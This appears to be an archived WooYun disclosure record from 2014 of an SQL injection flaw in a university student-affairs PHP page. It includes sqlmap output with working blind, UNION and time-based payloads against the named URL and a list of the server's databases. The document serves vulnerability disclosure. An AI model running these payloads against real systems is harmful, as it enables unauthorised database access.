乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-08-28: 细节已通知厂商并且等待厂商处理中 2014-09-02: 厂商已经主动忽略漏洞,细节向公众公开
主站
1.http://dxs.gzmu.edu.cn/sxpd/content.php?id=359 (GET) root权限 2.
web application technology: PHP 5.3.5back-end DBMS: MySQL 5.0.11sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=359' AND 8693=8693 AND 'KlxX'='KlxX Type: UNION query Title: MySQL UNION query (NULL) - 9 columns Payload: id=-3746' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71756a6f71,0x55766d537058626c4262,0x716b626471),NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=359' AND SLEEP(5) AND 'XDqn'='XDqn---web application technology: PHP 5.3.5back-end DBMS: MySQL 5.0.11available databases [10]:[*] cdcol[*] discuz[*] dxswz[*] information_schema[*] mysql[*] performance_schema[*] phpmyadmin[*] test[*] vip118[*] vote
2.dxswz有198个表,不再跑表了
开学修
危害等级:无影响厂商忽略
忽略时间:2014-09-02 13:02
暂无